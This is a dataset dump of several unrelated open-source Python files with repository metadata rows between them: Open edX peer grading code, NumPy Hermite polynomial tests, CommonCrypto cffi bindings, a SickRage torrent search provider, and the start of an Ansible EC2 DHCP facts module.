required = set(['location', 'submission_id', 'submission_key', 'score', 'feedback', 'rubric_scores[]'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
data_dict = {k: data.get(k) for k in required}
data_dict['rubric_scores'] = data.getall('rubric_scores[]')
data_dict['student_id'] = self.system.anonymous_student_id
data_dict['calibration_essay_id'] = data_dict['submission_id']
try:
response = self.peer_gs.save_calibration_essay(**data_dict)
if 'actual_rubric' in response:
rubric_renderer = combined_open_ended_rubric.CombinedOpenEndedRubric(self.system.render_template, True)
response['actual_rubric'] = rubric_renderer.render_rubric(response['actual_rubric'])['html']
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error saving calibration grade")
# This is a student_facing_error
return self._err_response('There was an error saving your score. Please notify course staff.')
def peer_grading_closed(self):
'''
Show the Peer grading closed template
'''
html = self.system.render_template('peer_grading/peer_grading_closed.html', {
'use_for_single_location': self.use_for_single_location_local
})
return html
def _find_corresponding_module_for_location(self, location):
"""
Find the peer grading module that exists at the given location.
"""
try:
return self.descriptor.system.load_item(location)
except ItemNotFoundError:
# The linked problem doesn't exist.
log.error("Problem {0} does not exist in this course.".format(location))
raise
except NoPathToItem:
# The linked problem does not have a path to it (ie is in a draft or other strange state).
log.error("Cannot find a path to problem {0} in this course.".format(location))
raise
def peer_grading(self, _data=None):
'''
Show a peer grading interface
'''
# call problem list service
success = False
error_text = ""
problem_list = []
try:
problem_list_dict = self.peer_gs.get_problem_list(self.course_id, self.system.anonymous_student_id)
success = problem_list_dict['success']
if 'error' in problem_list_dict:
error_text = problem_list_dict['error']
problem_list = problem_list_dict['problem_list']
except GradingServiceError:
# This is a student_facing_error
error_text = EXTERNAL_GRADER_NO_CONTACT_ERROR
log.error(error_text)
success = False
# catch error if if the json loads fails
except ValueError:
# This is a student_facing_error
error_text = "Could not get list of problems to peer grade. Please notify course staff."
log.error(error_text)
success = False
except Exception:
log.exception("Could not contact peer grading service.")
success = False
good_problem_list = []
for problem in problem_list:
problem_location = problem['location']
try:
descriptor = self._find_corresponding_module_for_location(problem_location)
except (NoPathToItem, ItemNotFoundError):
continue
if descriptor:
problem['due'] = descriptor.due
grace_period = descriptor.graceperiod
try:
problem_timeinfo = TimeInfo(problem['due'], grace_period)
except Exception:
log.error("Malformed due date or grace period string for location {0}".format(problem_location))
raise
if self._closed(problem_timeinfo):
problem['closed'] = True
else:
problem['closed'] = False
else:
# if we can't find the due date, assume that it doesn't have one
problem['due'] = None
problem['closed'] = False
good_problem_list.append(problem)
ajax_url = self.ajax_url
html = self.system.render_template('peer_grading/peer_grading.html', {
'ajax_url': ajax_url,
'success': success,
'problem_list': good_problem_list,
'error_text': error_text,
# Checked above
'staff_access': False,
'use_single_location': self.use_for_single_location_local,
})
return html
def peer_grading_problem(self, data=None):
'''
Show individual problem interface
'''
if data is None or data.get('location') is None:
if not self.use_for_single_location_local:
# This is an error case, because it must be set to use a single location to be called without get parameters
# This is a dev_facing_error
log.error(
"Peer grading problem in peer_grading_module called with no get parameters, but use_for_single_location is False.")
return {'html': "", 'success': False}
problem_location = self.link_to_location
elif data.get('location') is not None:
problem_location = self.course_id.make_usage_key_from_deprecated_string(data.get('location'))
self._find_corresponding_module_for_location(problem_location)
ajax_url = self.ajax_url
html = self.system.render_template('peer_grading/peer_grading_problem.html', {
'view_html': '',
'problem_location': problem_location,
'course_id': self.course_id,
'ajax_url': ajax_url,
# Checked above
'staff_access': False,
'use_single_location': self.use_for_single_location_local,
})
return {'html': html, 'success': True}
def get_instance_state(self):
"""
Returns the current instance state. The module can be recreated from the instance state.
Input: None
Output: A dictionary containing the instance state.
"""
state = {
'student_data_for_location': self.student_data_for_location,
}
return json.dumps(state)
def _check_feedback_length(self, data):
feedback = data.get("feedback")
if feedback and len(feedback) > MAX_ALLOWED_FEEDBACK_LENGTH:
return False, "Feedback is too long, Max length is {0} characters.".format(
MAX_ALLOWED_FEEDBACK_LENGTH
)
else:
return True, ""
def validate(self):
"""
Message for either error or warning validation message/s.
Returns message and type. Priority given to error type message.
"""
return self.descriptor.validate()
class PeerGradingDescriptor(PeerGradingFields, RawDescriptor):
"""
Module for adding peer grading questions
"""
mako_template = "widgets/raw-edit.html"
module_class = PeerGradingModule
filename_extension = "xml"
has_score = True
always_recalculate_grades = True
#Specify whether or not to pass in open ended interface
needs_open_ended_interface = True
metadata_translations = {
'is_graded': 'graded',
'attempts': 'max_attempts',
'due_data': 'due'
}
@property
def non_editable_metadata_fields(self):
non_editable_fields = super(PeerGradingDescriptor, self).non_editable_metadata_fields
non_editable_fields.extend([PeerGradingFields.due, PeerGradingFields.graceperiod])
return non_editable_fields
def get_required_module_descriptors(self):
"""
Returns a list of XModuleDescriptor instances upon which this module depends, but are
not children of this module.
"""
# If use_for_single_location is True, this is linked to an open ended problem.
if self.use_for_single_location:
# Try to load the linked module.
# If we can't load it, return empty list to avoid exceptions on progress page.
try:
linked_module = self.system.load_item(self.link_to_location)
return [linked_module]
except (NoPathToItem, ItemNotFoundError):
error_message = ("Cannot find the combined open ended module "
"at location {0} being linked to from peer "
"grading module {1}").format(self.link_to_location, self.location)
log.error(error_message)
return []
else:
return []
# Proxy to PeerGradingModule so that external callers don't have to know if they're working
# with a module or a descriptor
closed = module_attr('closed')
get_instance_state = module_attr('get_instance_state')
get_next_submission = module_attr('get_next_submission')
graded = module_attr('graded')
is_student_calibrated = module_attr('is_student_calibrated')
peer_grading = module_attr('peer_grading')
peer_grading_closed = module_attr('peer_grading_closed')
peer_grading_problem = module_attr('peer_grading_problem')
peer_gs = module_attr('peer_gs')
query_data_for_location = module_attr('query_data_for_location')
save_calibration_essay = module_attr('save_calibration_essay')
save_grade = module_attr('save_grade')
show_calibration_essay = module_attr('show_calibration_essay')
use_for_single_location_local = module_attr('use_for_single_location_local')
_find_corresponding_module_for_location = module_attr('_find_corresponding_module_for_location')
def validate(self):
"""
Validates the state of this instance. This is the override of the general XBlock method,
and it will also ask its superclass to validate.
"""
validation = super(PeerGradingDescriptor, self).validate()
validation = StudioValidation.copy(validation)
i18n_service = self.runtime.service(self, "i18n")
validation.summary = StudioValidationMessage(
StudioValidationMessage.ERROR,
i18n_service.ugettext(
"ORA1 is no longer supported. To use this assessment, "
"replace this ORA1 component with an ORA2 component."
)
)
return validation
| agpl-3.0 | -983,219,990,073,663,500 | 2,153,952,094,998,848,500 | 38.947368 | 164 | 0.609439 | false |
CallaJun/hackprince | indico/numpy/polynomial/tests/test_hermite_e.py | 123 | 17069 | """Tests for hermite_e module.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import numpy.polynomial.hermite_e as herme
from numpy.polynomial.polynomial import polyval
from numpy.testing import (
TestCase, assert_almost_equal, assert_raises,
assert_equal, assert_, run_module_suite)
He0 = np.array([1])
He1 = np.array([0, 1])
He2 = np.array([-1, 0, 1])
He3 = np.array([0, -3, 0, 1])
He4 = np.array([3, 0, -6, 0, 1])
He5 = np.array([0, 15, 0, -10, 0, 1])
He6 = np.array([-15, 0, 45, 0, -15, 0, 1])
He7 = np.array([0, -105, 0, 105, 0, -21, 0, 1])
He8 = np.array([105, 0, -420, 0, 210, 0, -28, 0, 1])
He9 = np.array([0, 945, 0, -1260, 0, 378, 0, -36, 0, 1])
Helist = [He0, He1, He2, He3, He4, He5, He6, He7, He8, He9]
def trim(x):
return herme.hermetrim(x, tol=1e-6)
class TestConstants(TestCase):
def test_hermedomain(self):
assert_equal(herme.hermedomain, [-1, 1])
def test_hermezero(self):
assert_equal(herme.hermezero, [0])
def test_hermeone(self):
assert_equal(herme.hermeone, [1])
def test_hermex(self):
assert_equal(herme.hermex, [0, 1])
class TestArithmetic(TestCase):
x = np.linspace(-3, 3, 100)
def test_hermeadd(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] += 1
res = herme.hermeadd([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_hermesub(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] -= 1
res = herme.hermesub([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_hermemulx(self):
assert_equal(herme.hermemulx([0]), [0])
assert_equal(herme.hermemulx([1]), [0, 1])
for i in range(1, 5):
ser = [0]*i + [1]
tgt = [0]*(i - 1) + [i, 0, 1]
assert_equal(herme.hermemulx(ser), tgt)
def test_hermemul(self):
# check values of result
for i in range(5):
pol1 = [0]*i + [1]
val1 = herme.hermeval(self.x, pol1)
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
pol2 = [0]*j + [1]
val2 = herme.hermeval(self.x, pol2)
pol3 = herme.hermemul(pol1, pol2)
val3 = herme.hermeval(self.x, pol3)
assert_(len(pol3) == i + j + 1, msg)
assert_almost_equal(val3, val1*val2, err_msg=msg)
def test_hermediv(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
ci = [0]*i + [1]
cj = [0]*j + [1]
tgt = herme.hermeadd(ci, cj)
quo, rem = herme.hermediv(tgt, ci)
res = herme.hermeadd(herme.hermemul(quo, ci), rem)
assert_equal(trim(res), trim(tgt), err_msg=msg)
class TestEvaluation(TestCase):
# coefficients of 1 + 2*x + 3*x**2
c1d = np.array([4., 2., 3.])
c2d = np.einsum('i,j->ij', c1d, c1d)
c3d = np.einsum('i,j,k->ijk', c1d, c1d, c1d)
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
y = polyval(x, [1., 2., 3.])
def test_hermeval(self):
#check empty input
assert_equal(herme.hermeval([], [1]).size, 0)
#check normal input)
x = np.linspace(-1, 1)
y = [polyval(x, c) for c in Helist]
for i in range(10):
msg = "At i=%d" % i
tgt = y[i]
res = herme.hermeval(x, [0]*i + [1])
assert_almost_equal(res, tgt, err_msg=msg)
#check that shape is preserved
for i in range(3):
dims = [2]*i
x = np.zeros(dims)
assert_equal(herme.hermeval(x, [1]).shape, dims)
assert_equal(herme.hermeval(x, [1, 0]).shape, dims)
assert_equal(herme.hermeval(x, [1, 0, 0]).shape, dims)
def test_hermeval2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, herme.hermeval2d, x1, x2[:2], self.c2d)
#test values
tgt = y1*y2
res = herme.hermeval2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermeval2d(z, z, self.c2d)
assert_(res.shape == (2, 3))
def test_hermeval3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, herme.hermeval3d, x1, x2, x3[:2], self.c3d)
#test values
tgt = y1*y2*y3
res = herme.hermeval3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermeval3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3))
def test_hermegrid2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j->ij', y1, y2)
res = herme.hermegrid2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermegrid2d(z, z, self.c2d)
assert_(res.shape == (2, 3)*2)
def test_hermegrid3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j,k->ijk', y1, y2, y3)
res = herme.hermegrid3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermegrid3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3)*3)
class TestIntegral(TestCase):
def test_hermeint(self):
# check exceptions
assert_raises(ValueError, herme.hermeint, [0], .5)
assert_raises(ValueError, herme.hermeint, [0], -1)
assert_raises(ValueError, herme.hermeint, [0], 1, [0, 0])
# test integration of zero polynomial
for i in range(2, 5):
k = [0]*(i - 2) + [1]
res = herme.hermeint([0], m=i, k=k)
assert_almost_equal(res, [0, 1])
# check single integration with integration constant
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [1/scl]
hermepol = herme.poly2herme(pol)
hermeint = herme.hermeint(hermepol, m=1, k=[i])
res = herme.herme2poly(hermeint)
assert_almost_equal(trim(res), trim(tgt))
# check single integration with integration constant and lbnd
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
hermepol = herme.poly2herme(pol)
hermeint = herme.hermeint(hermepol, m=1, k=[i], lbnd=-1)
assert_almost_equal(herme.hermeval(-1, hermeint), i)
# check single integration with integration constant and scaling
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [2/scl]
hermepol = herme.poly2herme(pol)
hermeint = herme.hermeint(hermepol, m=1, k=[i], scl=2)
res = herme.herme2poly(hermeint)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with default k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1)
res = herme.hermeint(pol, m=j)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with defined k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1, k=[k])
res = herme.hermeint(pol, m=j, k=list(range(j)))
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with lbnd
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1, k=[k], lbnd=-1)
res = herme.hermeint(pol, m=j, k=list(range(j)), lbnd=-1)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with scaling
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1, k=[k], scl=2)
res = herme.hermeint(pol, m=j, k=list(range(j)), scl=2)
assert_almost_equal(trim(res), trim(tgt))
def test_hermeint_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([herme.hermeint(c) for c in c2d.T]).T
res = herme.hermeint(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([herme.hermeint(c) for c in c2d])
res = herme.hermeint(c2d, axis=1)
assert_almost_equal(res, tgt)
tgt = np.vstack([herme.hermeint(c, k=3) for c in c2d])
res = herme.hermeint(c2d, k=3, axis=1)
assert_almost_equal(res, tgt)
class TestDerivative(TestCase):
def test_hermeder(self):
# check exceptions
assert_raises(ValueError, herme.hermeder, [0], .5)
assert_raises(ValueError, herme.hermeder, [0], -1)
# check that zeroth deriviative does nothing
for i in range(5):
tgt = [0]*i + [1]
res = herme.hermeder(tgt, m=0)
assert_equal(trim(res), trim(tgt))
# check that derivation is the inverse of integration
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = herme.hermeder(herme.hermeint(tgt, m=j), m=j)
assert_almost_equal(trim(res), trim(tgt))
# check derivation with scaling
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = herme.hermeder(
herme.hermeint(tgt, m=j, scl=2), m=j, scl=.5)
assert_almost_equal(trim(res), trim(tgt))
def test_hermeder_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([herme.hermeder(c) for c in c2d.T]).T
res = herme.hermeder(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([herme.hermeder(c) for c in c2d])
res = herme.hermeder(c2d, axis=1)
assert_almost_equal(res, tgt)
class TestVander(TestCase):
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
def test_hermevander(self):
# check for 1d x
x = np.arange(3)
v = herme.hermevander(x, 3)
assert_(v.shape == (3, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], herme.hermeval(x, coef))
# check for 2d x
x = np.array([[1, 2], [3, 4], [5, 6]])
v = herme.hermevander(x, 3)
assert_(v.shape == (3, 2, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], herme.hermeval(x, coef))
def test_hermevander2d(self):
# also tests hermeval2d for non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3))
van = herme.hermevander2d(x1, x2, [1, 2])
tgt = herme.hermeval2d(x1, x2, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = herme.hermevander2d([x1], [x2], [1, 2])
assert_(van.shape == (1, 5, 6))
def test_hermevander3d(self):
# also tests hermeval3d for non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3, 4))
van = herme.hermevander3d(x1, x2, x3, [1, 2, 3])
tgt = herme.hermeval3d(x1, x2, x3, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = herme.hermevander3d([x1], [x2], [x3], [1, 2, 3])
assert_(van.shape == (1, 5, 24))
class TestFitting(TestCase):
def test_hermefit(self):
def f(x):
return x*(x - 1)*(x - 2)
# Test exceptions
assert_raises(ValueError, herme.hermefit, [1], [1], -1)
assert_raises(TypeError, herme.hermefit, [[1]], [1], 0)
assert_raises(TypeError, herme.hermefit, [], [1], 0)
assert_raises(TypeError, herme.hermefit, [1], [[[1]]], 0)
assert_raises(TypeError, herme.hermefit, [1, 2], [1], 0)
assert_raises(TypeError, herme.hermefit, [1], [1, 2], 0)
assert_raises(TypeError, herme.hermefit, [1], [1], 0, w=[[1]])
assert_raises(TypeError, herme.hermefit, [1], [1], 0, w=[1, 1])
# Test fit
x = np.linspace(0, 2)
y = f(x)
#
coef3 = herme.hermefit(x, y, 3)
assert_equal(len(coef3), 4)
assert_almost_equal(herme.hermeval(x, coef3), y)
#
coef4 = herme.hermefit(x, y, 4)
assert_equal(len(coef4), 5)
assert_almost_equal(herme.hermeval(x, coef4), y)
#
coef2d = herme.hermefit(x, np.array([y, y]).T, 3)
assert_almost_equal(coef2d, np.array([coef3, coef3]).T)
# test weighting
w = np.zeros_like(x)
yw = y.copy()
w[1::2] = 1
y[0::2] = 0
wcoef3 = herme.hermefit(x, yw, 3, w=w)
assert_almost_equal(wcoef3, coef3)
#
wcoef2d = herme.hermefit(x, np.array([yw, yw]).T, 3, w=w)
assert_almost_equal(wcoef2d, np.array([coef3, coef3]).T)
# test scaling with complex values x points whose square
# is zero when summed.
x = [1, 1j, -1, -1j]
assert_almost_equal(herme.hermefit(x, x, 1), [0, 1])
class TestCompanion(TestCase):
def test_raises(self):
assert_raises(ValueError, herme.hermecompanion, [])
assert_raises(ValueError, herme.hermecompanion, [1])
def test_dimensions(self):
for i in range(1, 5):
coef = [0]*i + [1]
assert_(herme.hermecompanion(coef).shape == (i, i))
def test_linear_root(self):
assert_(herme.hermecompanion([1, 2])[0, 0] == -.5)
class TestGauss(TestCase):
def test_100(self):
x, w = herme.hermegauss(100)
# test orthogonality. Note that the results need to be normalized,
# otherwise the huge values that can arise from fast growing
# functions like Laguerre can be very confusing.
v = herme.hermevander(x, 99)
vv = np.dot(v.T * w, v)
vd = 1/np.sqrt(vv.diagonal())
vv = vd[:, None] * vv * vd
assert_almost_equal(vv, np.eye(100))
# check that the integral of 1 is correct
tgt = np.sqrt(2*np.pi)
assert_almost_equal(w.sum(), tgt)
class TestMisc(TestCase):
def test_hermefromroots(self):
res = herme.hermefromroots([])
assert_almost_equal(trim(res), [1])
for i in range(1, 5):
roots = np.cos(np.linspace(-np.pi, 0, 2*i + 1)[1::2])
pol = herme.hermefromroots(roots)
res = herme.hermeval(roots, pol)
tgt = 0
assert_(len(pol) == i + 1)
assert_almost_equal(herme.herme2poly(pol)[-1], 1)
assert_almost_equal(res, tgt)
def test_hermeroots(self):
assert_almost_equal(herme.hermeroots([1]), [])
assert_almost_equal(herme.hermeroots([1, 1]), [-1])
for i in range(2, 5):
tgt = np.linspace(-1, 1, i)
res = herme.hermeroots(herme.hermefromroots(tgt))
assert_almost_equal(trim(res), trim(tgt))
def test_hermetrim(self):
coef = [2, -1, 1, 0]
# Test exceptions
assert_raises(ValueError, herme.hermetrim, coef, -1)
# Test results
assert_equal(herme.hermetrim(coef), coef[:-1])
assert_equal(herme.hermetrim(coef, 1), coef[:-3])
assert_equal(herme.hermetrim(coef, 2), [0])
def test_hermeline(self):
assert_equal(herme.hermeline(3, 4), [3, 4])
def test_herme2poly(self):
for i in range(10):
assert_almost_equal(herme.herme2poly([0]*i + [1]), Helist[i])
def test_poly2herme(self):
for i in range(10):
assert_almost_equal(herme.poly2herme(Helist[i]), [0]*i + [1])
def test_weight(self):
x = np.linspace(-5, 5, 11)
tgt = np.exp(-.5*x**2)
res = herme.hermeweight(x)
assert_almost_equal(res, tgt)
if __name__ == "__main__":
run_module_suite()
| lgpl-3.0 | 5,875,520,885,668,834,000 | -7,003,204,939,527,368,000 | 32.015474 | 77 | 0.517488 | false |
Ayrx/cryptography | src/_cffi_src/commoncrypto/cf.py | 8 | 3224 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <CoreFoundation/CoreFoundation.h>
"""
TYPES = """
typedef bool Boolean;
typedef signed long OSStatus;
typedef unsigned char UInt8;
typedef uint32_t UInt32;
typedef const void * CFAllocatorRef;
const CFAllocatorRef kCFAllocatorDefault;
typedef ... *CFDataRef;
typedef signed long long CFIndex;
typedef ... *CFStringRef;
typedef ... *CFArrayRef;
typedef ... *CFMutableArrayRef;
typedef ... *CFBooleanRef;
typedef ... *CFErrorRef;
typedef ... *CFNumberRef;
typedef ... *CFTypeRef;
typedef ... *CFDictionaryRef;
typedef ... *CFMutableDictionaryRef;
typedef struct {
...;
} CFDictionaryKeyCallBacks;
typedef struct {
...;
} CFDictionaryValueCallBacks;
typedef struct {
...;
} CFRange;
typedef struct {
...;
} CFArrayCallBacks;
typedef UInt32 CFStringEncoding;
enum {
kCFStringEncodingASCII = 0x0600
};
enum {
kCFNumberSInt8Type = 1,
kCFNumberSInt16Type = 2,
kCFNumberSInt32Type = 3,
kCFNumberSInt64Type = 4,
kCFNumberFloat32Type = 5,
kCFNumberFloat64Type = 6,
kCFNumberCharType = 7,
kCFNumberShortType = 8,
kCFNumberIntType = 9,
kCFNumberLongType = 10,
kCFNumberLongLongType = 11,
kCFNumberFloatType = 12,
kCFNumberDoubleType = 13,
kCFNumberCFIndexType = 14,
kCFNumberNSIntegerType = 15,
kCFNumberCGFloatType = 16,
kCFNumberMaxType = 16
};
typedef int CFNumberType;
const CFDictionaryKeyCallBacks kCFTypeDictionaryKeyCallBacks;
const CFDictionaryValueCallBacks kCFTypeDictionaryValueCallBacks;
const CFArrayCallBacks kCFTypeArrayCallBacks;
const CFBooleanRef kCFBooleanTrue;
const CFBooleanRef kCFBooleanFalse;
"""
FUNCTIONS = """
CFDataRef CFDataCreate(CFAllocatorRef, const UInt8 *, CFIndex);
CFStringRef CFStringCreateWithCString(CFAllocatorRef, const char *,
CFStringEncoding);
CFDictionaryRef CFDictionaryCreate(CFAllocatorRef, const void **,
const void **, CFIndex,
const CFDictionaryKeyCallBacks *,
const CFDictionaryValueCallBacks *);
CFMutableDictionaryRef CFDictionaryCreateMutable(
CFAllocatorRef,
CFIndex,
const CFDictionaryKeyCallBacks *,
const CFDictionaryValueCallBacks *
);
void CFDictionarySetValue(CFMutableDictionaryRef, const void *, const void *);
CFIndex CFArrayGetCount(CFArrayRef);
const void *CFArrayGetValueAtIndex(CFArrayRef, CFIndex);
CFIndex CFDataGetLength(CFDataRef);
void CFDataGetBytes(CFDataRef, CFRange, UInt8 *);
CFRange CFRangeMake(CFIndex, CFIndex);
void CFShow(CFTypeRef);
Boolean CFBooleanGetValue(CFBooleanRef);
CFNumberRef CFNumberCreate(CFAllocatorRef, CFNumberType, const void *);
void CFRelease(CFTypeRef);
CFTypeRef CFRetain(CFTypeRef);
CFMutableArrayRef CFArrayCreateMutable(CFAllocatorRef, CFIndex,
const CFArrayCallBacks *);
void CFArrayAppendValue(CFMutableArrayRef, const void *);
"""
MACROS = """
"""
CUSTOMIZATIONS = """
"""
| bsd-3-clause | -1,246,351,158,686,902,500 | -1,127,182,725,622,564,100 | 27.530973 | 79 | 0.728908 | false |
kingmotley/SickRage | sickbeard/providers/torrentproject.py | 1 | 4736 | # coding=utf-8
# Author: Gonçalo M. (aka duramato/supergonkas) <[email protected]>
#
# URL: https://sickrage.github.io
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from requests.compat import urljoin
import validators
from sickbeard import logger, tvcache
from sickbeard.common import USER_AGENT
from sickrage.helper.common import convert_size, try_int
from sickrage.providers.torrent.TorrentProvider import TorrentProvider
class TorrentProjectProvider(TorrentProvider): # pylint: disable=too-many-instance-attributes
def __init__(self):
# Provider Init
TorrentProvider.__init__(self, "TorrentProject")
# Credentials
self.public = True
# Torrent Stats
self.minseed = None
self.minleech = None
# URLs
self.url = 'https://torrentproject.se/'
self.custom_url = None
self.headers.update({'User-Agent': USER_AGENT})
# Proper Strings
# Cache
self.cache = tvcache.TVCache(self, search_params={'RSS': ['0day']})
def search(self, search_strings, age=0, ep_obj=None): # pylint: disable=too-many-locals, too-many-branches, too-many-statements
results = []
search_params = {
'out': 'json',
'filter': 2101,
'showmagnets': 'on',
'num': 50
}
for mode in search_strings: # Mode = RSS, Season, Episode
items = []
logger.log(u"Search Mode: {0}".format(mode), logger.DEBUG)
for search_string in search_strings[mode]:
if mode != 'RSS':
logger.log(u"Search string: {0}".format
(search_string.decode("utf-8")), logger.DEBUG)
search_params['s'] = search_string
if self.custom_url:
if not validators.url(self.custom_url):
logger.log("Invalid custom url set, please check your settings", logger.WARNING)
return results
search_url = self.custom_url
else:
search_url = self.url
torrents = self.get_url(search_url, params=search_params, returns='json')
if not (torrents and "total_found" in torrents and int(torrents["total_found"]) > 0):
logger.log(u"Data returned from provider does not contain any torrents", logger.DEBUG)
continue
del torrents["total_found"]
results = []
for i in torrents:
title = torrents[i]["title"]
seeders = try_int(torrents[i]["seeds"], 1)
leechers = try_int(torrents[i]["leechs"], 0)
if seeders < self.minseed or leechers < self.minleech:
if mode != 'RSS':
logger.log(u"Torrent doesn't meet minimum seeds & leechers not selecting : {0}".format(title), logger.DEBUG)
continue
t_hash = torrents[i]["torrent_hash"]
torrent_size = torrents[i]["torrent_size"]
if not all([t_hash, torrent_size]):
continue
download_url = torrents[i]["magnet"] + self._custom_trackers
size = convert_size(torrent_size) or -1
if not all([title, download_url]):
continue
item = {'title': title, 'link': download_url, 'size': size, 'seeders': seeders, 'leechers': leechers, 'hash': t_hash}
if mode != 'RSS':
logger.log(u"Found result: {0} with {1} seeders and {2} leechers".format
(title, seeders, leechers), logger.DEBUG)
items.append(item)
# For each search mode sort all the items by seeders if available
items.sort(key=lambda d: try_int(d.get('seeders', 0)), reverse=True)
results += items
return results
provider = TorrentProjectProvider()
| gpl-3.0 | 7,317,385,819,416,479,000 | 9,193,085,951,876,431,000 | 35.992188 | 137 | 0.568321 | false |
sidartaoliveira/ansible | lib/ansible/modules/cloud/amazon/ec2_vpc_dhcp_options_facts.py | 33 | 5092 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_vpc_dhcp_options_facts
short_description: Gather facts about dhcp options sets in AWS
description:
- Gather facts about dhcp options sets in AWS
version_added: "2.2"
requirements: [ boto3 ]
author: "Nick Aslanidis (@naslanidis)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeRouteTables.html) for possible filters.
required: false
default: null
dhcp_options_ids:
description:
- Get details of specific DHCP Option ID
- Provide this value as a list
required: false
default: None
aliases: ['DhcpOptionsIds']
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# # Note: These examples do not set authentication details, see the AWS Guide for details.
- name: Gather facts about all DHCP Option sets for an account or profile
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
register: dhcp_facts
- name: Gather facts about a filtered list of DHCP Option sets
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
filters:
"tag:Name": "abc-123"
register: dhcp_facts
- name: Gather facts about a specific DHCP Option set by DhcpOptionId
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
DhcpOptionsIds: dopt-123fece2
register: dhcp_facts
'''
RETURN = '''
dhcp_options:
description: The dhcp option sets for the account
returned: always
type: list
changed:
description: True if listing the dhcp options succeeds
type: bool
returned: always
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn, HAS_BOTO3
